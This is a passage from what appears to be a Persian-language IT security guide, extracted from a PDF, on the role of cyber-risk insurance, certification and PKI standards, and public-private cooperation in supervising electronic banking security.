ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺳﺎﺧﺘﺎﺭ ﻣﺠﺪﺩ ﺑﻴﺎﺑﺪ ﻭ ﺑﻪ ﻳﻚ ﺣﺎﻟـﺖ
ﺍﺳﺘﻮﺍﺭ ﺑﺮﺳﺪ؛ ﺍﻣﺎ ﺩﺭ ﻫﺮ ﺣﺎﻝ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳـﻦ ﺷـﺮﺍﻳﻂ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ
ﻛﺮﺩ.
Banking
Electronic
Supervision’s
Banking
Group
41
١٣٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﭼﻨﺪﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻬـﻢ ﺩﺍﺭﻧـﺪ ،ﺍﻣـﺎ
ﻻ ﺍﻃﻼﻋــﺎﺕ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻧﻬﺎ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻳــﺎ ﺑــﺎ
ﻣﻌﻤــﻮ ﹰ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺮﻭﻥﻣﺮﺯﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻪ ﻧﻤـﻲﺷـﻮﻧﺪ )ﮔـﺎﻫﻲ
ﺍﻭﻗﺎﺕ ﺑﻪ ﺩﻻﻳﻞ ﺣﻘﻮﻗﻲ( .ﻣﻮﺿﻮﻉ ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺳـﺎﺯﻣﺎﻧﻬﺎ
ﺩﺭ ﺍﺑﻌﺎﺩ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻓﺮﺍﺗﺮ ﺍﺯ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ .ﺩﺭ ﻫﺮ
ﺻﻮﺭﺕ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺩﻭﻟﺘﻬـﺎ ﺳـﻌﻲ ﺩﺍﺭﻧـﺪ ﺑـﺎ ﺟـﺮﺍﺋﻢ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﻣﺤﻴﻂ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺮﺧﻴﺰﻧﺪ ،ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻴـﺰ
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺍﻳـﻦ ﺑﺤـﺚ ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛﻠﻴـﺪﻱ ﺑـﻪ
ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ.
ﺭﻛﻦ ﭼﻬﺎﺭﻡ:
ﻧﻘﺶ ﺑﻴﻤﺔ ﺧﺼﻮﺻﻲ ﺑﻪ ﻋﻨﻮﺍﻥ
ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﺗﻜﻤﻴﻠﻲ
ﻫﺮﭼﻨﺪ ﺑﻴﻤﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﻣﺨـﺎﻃﺮﺍﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﻨﻮﺯ ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴـﺔ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺣـﺎﻭﻱ
ﻣﺸﻜﻼﺗﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺺ ﺍﻭﻝ ﻭ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣـﻲﺑﺎﺷـﺪ.
ﺗﺨﻤﻴﻦ ﻫﺰﻳﻨﺔ ﻣﺨﺎﻃﺮﺍﺕ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺗﻮﺳﻌﺔ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﻨـﺪ،
ﻭﻟﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ،ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﺑﺎﻳـﺪ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮﻱ
ﺩﺭﺑﺎﺭﺓ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻧﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻲ ﺍﻳﻦ ﻧﻮﻉ
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﺛﺒﺖﺷﺪﺓ ﻛﻨﻮﻧ ﹺ
ﺑﻴﻤﻪ ،ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳـﺪﻱ ﻛـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺮﺍﻱ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻧﺪ ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﻧـﺸﺪﻩ ﺍﺳـﺖ .ﺍﺭﺍﺋـﻪ-
ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻟﺰﺍﻡ ﻛﻨﻨﺪ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺍﻱ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﻮﻧﺪ ﻭ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﺗﺎ ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﻣﺠﺒﻮﺭ ﺑـﻪ ﺗﺒﻌﻴـﺖ ﺍﺯ
ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺟﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻴـﺮﻭﻱ ﻣﻬـﻢ ﺑـﺮﺍﻱ
ﺗﻐﻴﻴﺮ ﺍﻟﺰﺍﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧـﺪ
ﻣﻮﺟﺐ ﺑﻬﺒﻮﺩ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣـﺪﺍﻗﻠﻲ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ
ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﻮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺻﻨﻌﺖ ﺟﻬﺎﻧﻲ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻻﻳﻪﺑﻨﺪﻱﺷﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭘﻴﺸﻨﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﺗﺤﺮﻳﻚ ﻛﻨـﺪ.
ﺛﺎﻧﻴﹰﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ
ﺑﺨﻮﺍﻫﻨﺪ ﻛﻪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ
ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﺄﻳﻴﺪﺷـﺪﻩ ﻭ ﻗﺎﺑـﻞ
ﻗﺒﻮﻝ ﺻﻨﻌﺘﻲ ﺑﻬﺮﻩ ﻣﻲﺑﺮﻧﺪ ﺗﺎ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ ﺭﺍ ﻛـﺎﻫﺶ
ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ .ﺛﺎﻟﺜـﹰﺎ ﺷـﺮﻛﺘﻬﺎﻱ ﺑﻴﻤـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ﺭﺍ
ﺗﺮﻏﻴﺐ ﻛﻨﻨﺪ ﺗﺎ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺭﺍ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ ﻛـﻪ
ﻛﻴﻔﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﻭ ﮔﺰﺍﺭﺷـﻬﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺧـﺪﺍﺩﻫﺎ ﺭﺍ ﺑﮕﻮﻧـﻪﺍﻱ
ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﺑﺘـﻮﺍﻥ ﺗﺤﻠﻴـﻞ ﺑﻬﺘـﺮﻱ ﺩﺭ
ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺎﺯﮔـﺸﺖ ﺳـﺮﻣﺎﻳﻪ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ.
ﺳﺮﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﻪ ﺻﻨﻌﺖ ﺑﻴﻤﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ﻣﻨﺘﺸﺮ ﻛﻨﺪ ﻛﻪ
ﺩﺭ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺖ-
ﭘﺬﻳﺮﻱ ﺩﺭ ﻗﺒﺎﻝ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻴـﺎﻥ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻌﺎﻝ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ )ﻣﺜـﻞ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻥ( ﺍﻟﺰﺍﻣﻲ ﺷﻮﺩ.
ﺭﻛﻦ ﭘﻨﺠﻢ:
ﮔﻮﺍﻫﻲ ،٤٢ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﻭ
ﻧﻘﺶ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ
ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺑﺎ ﻫﻤﻜﺎﺭﻱ ﻳﻜﺪﻳﮕﺮ ﺑـﺮﺍﻱ
ﺗﺪﻭﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻫﻤﺎﻫﻨﮓﺳﺎﺯﻱ ﻃﺮﺣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﻭ ﺍﻋﻄﺎﻱ
ﮔﻮﺍﻫﻲ ﺍﻗـﺪﺍﻡ ﻛﻨﻨـﺪ .ﺩﻭ ﻋﻨـﻮﺍﻥ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ ﺁﻧﻬـﺎ
ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻋﻨﺎﺻﺮ ﻫﺮ ﺗﺮﺍﻛﻨﺶ.
ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻣﻮﺭ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ،ﻓﺮﻭﺷﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ
ﺑﺮ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺗﺄﺛﻴﺮ ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﻛﺴﺐ ﻣﺠﻮﺯ ﻧﻤﺎﻳﻨـﺪ.
ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟﺰﺍﻡ ﺻـﻨﻌﺖ ﺑـﻪ ﺗﺄﻳﻴـﺪ ﻭ ﺍﻋﻄـﺎﻱ
Certification
42
ﺑﺨﺶ ﺳﻮﻡ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﻩ ﺑﺮ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻫﻨﻮﺯ ﺩﺭﺣـﺎﻝ ﺗـﺪﻭﻳﻦ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻫﺴﺘﻨﺪ .ﺑﻪ ﻋﻠﺖ ﻣﺸﻜﻼﺕ ﺫﺍﺗـﻲ ﻛـﻪ ﺩﺭ
ﻣﺴﺌﻠﻪ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻣﺒﺘﻨﻲ ﺑـﺮ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ
ﻲ ﻣﺘﻐﻴﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻳﺎﻓﺘﻦ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺗﻜﻤﻴﻠﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ
ﻓﻨ ﹺ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﻋﻠﻴـﺮﻏﻢ ﻧﻘـﺎﻳﺺ
ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﻼﻋـﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗﺨﻤـﻴﻦ ﺁﺳـﻴﺒﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻣﺪﺗﻲ ﺍﺳﺖ ﻛﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﻪ ﺩﺭ ﺍﻳـﻦ
ﻗﺴﻤﺖ ﻧﻘﺶ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ .ﭘﻴﺶﺑﻴﻨـﻲ ﻣـﻲﺷـﻮﺩ ﺩﺭ ﭼﻨـﺪ ﺳـﺎﻝ
ﺁﻳﻨﺪﻩ ﺗﻨﻬﺎ ﺩﺭ ﺑﺎﺯﺍﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ،ﺭﺷـﺪ ﺑﻴﻤـﺔ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺭ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﮔـﺴﺘﺮﺓ ﻣﺨـﺎﻃﺮﺍﺕ ﺁﻥ ﺳـﺎﻻﻧﻪ ﺑـﻪ ۲،۵
ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺑﺮﺳﺪ.
ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻣﺨــﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷــﻮﻧﺪ ،ﺍﻳــﻦ ﺩﺳــﺘﻪ ﺍﺯ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ.
١٣٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﮔﻮﺍﻫﻲ ﺑﻪ ﺍﺭﺍﺋﻪﺩﻫﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﺎﺷـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﺻﻨﻌﺖ ﺍﻣﻨﻴﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑـﺎ ﻋﻨـﻮﺍﻥ
"ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ" ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺣﻘﻴﻘـﺖ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ
ﺍﺗﻔﺎﻕ ،ﺑﺎ ﺗﻬﻴﺔ ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ،
ﻣﺴﺆﻟﻴﺖﭘﺬﻳﺮﻱ ﻣﻴـﺎﻥ ﺻـﻨﻌﺖ ﻭ ﻣﺘﺨﺼـﺼﻴﻦ ﺁﻥ ،ﻭ ﺗﻔﻜﻴـﻚ
ﻦ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺧﻮﺩ ﺭﺍ ﻣﺘﺨﺼﺺ ﻣﻲﺩﺍﻧﻨـﺪ،
ﻣﺘﺨﺼﺼﻴ ﹺ
ﺍﻳﻦ ﺗﻤﺎﻡ ﺻﻨﻌﺖ ﺍﺳﺖ ﻛﻪ ﺳﻮﺩ ﻣﻲﺑـﺮﺩ .ﺍﻳـﻦ ﺭﻭﺵ ﻫﻤﭽﻨـﻴﻦ
ﻭﺿﻌﻴﺖ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻪ ﻭﺿﻌﻴﺖ ﻳﻚ ﺣـﻮﺯﺓ ﺣﺮﻓـﻪﺍﻱ ﺍﺭﺗﻘـﺎ
ﻣﻲﺩﻫﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺻﻨﻌﺖ ﺍﻧﮕﻴـﺰﺓ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﻭ
ﺍﻋﻤﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺣﻮﺯﺓ ﺑﻌﺪﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﻣﻼﺣﻈـﻪ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﮔـﻮﺍﻫﻲﻫـﺎﻱ
ﻋﻨﺎﺻﺮ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻠﻪ ﻧﻈﻴﺮ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ .ﮔـﻮﺍﻫﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺭﺯﺵ ﻳﻚ ﻣﻌﺎﻣﻠﻪ ﺭﺍ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛـﺴﻲ ﻭ ﭼـﻪ
ﭼﻴﺰﻱ ﺁﻧﺮﺍ ﮔﻮﺍﻫﻲ ﻛﺮﺩﻩ ﺍﻓﺰﺍﻳﺶ ﺩﻫـﺪ .ﮔـﻮﺍﻫﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻧﻈﻴﺮ ﺍﺩﺍﺭﺓ ﭘﺴﺖ ﻳـﺎ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ
ﺧﺼﻮﺻﻲ ﻣﺜﻞ ﺑﺎﻧﻚ ﺻﺎﺩﺭ ﺷﻮﺩ .ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﻣـﺴﺎﺋﻞ
ﺳــﺎﺧﺘﺎﺭﻱ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺧــﺎﺹ ﺧــﻮﺩ ﺭﺍ ﺩﺍﺭﻧــﺪ .ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ
ﻛــﺸﻮﺭﻫﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺮﻛﺘﻬﺎﻱ ﺧــﺼﻮﺻﻲ ﺑــﺮﺍﻱ ﺗﻬﻴــﺔ
ﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺑﻬﺘﺮ ﻋﻤﻞ
ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺗ ﹺ
ﻛﻨﻨﺪ.
ﻋﻨﺼﺮ ﺍﺻﻠﻲ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻮﻓﻖ ﺑﺮﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﺍﻳﻦ ﺍﺳـﺖ
ﻛﻪ ﺳﺎﺧﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣﺮﺍﻛﺰ ﻗﻀﺎﻳﻲ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﺑﺎﻳـﺪ
ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ
ﻭ ﺣﺪﻭﺩ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻳﻚ ﺗﺄﻳﻴﺪﻛﻨﻨﺪﻩ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤـﺎﻡ
ﺣﻮﺯﻩﻫﺎﻱ ﻗﻀﺎﻳﻲ ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺟﺎﻣﻊ ﺑﺎﺷﺪ.
ﺍﮔﺮﭼﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ ) ٤٣(PKIﻭ
ﻻ ﺑﻌﻨﻮﺍﻥ ﺗﻨﻬﺎ ﺭﺍﻫﻬﺎﻱ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ ﺑـﺮﺍﻱ
ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻣﻌﻤﻮ ﹰ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ ،ﻟﻴﻜﻦ ﺗﻮﺟﻪ ﺑﻪ ﻫﺰﻳﻨﻪﻫﺎ ﻭ
ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﻩ ﻭ ﺩﺭﻫﻢ PKIﻭ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺁﻥ
ﺑﺎ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ) ٤٤(CAsﻧﻴﺰ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﻳﻚ ﺭﺍﻩﺣﻞ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻣﻌﻘـﻮﻝ ﻭ ﻣﻨﺎﺳـﺐ ﺑﺎﺷـﺪ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ
ﻣﺮﺯﻫﺎﻳﻲ ﭼﻮﻥ ﺍﻋﺘﻤﺎﺩ ﻭ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷﺪ ﻭ ﺍﻳﻦ
ﭼﻨﺪﺍﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺁﻥ ﻛـﺪﺍﻡ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
Public Key Infrastructure
Certification Authorities
43
44
ﺭﻛﻦ ﺷﺸﻢ:
ﺩﻗﺖ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ،
ﻭ ﻫﻤﻜﺎﺭﻱ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ
ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺩﻗﻴﻖ ﺩﺭﺑﺎﺭﺓ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
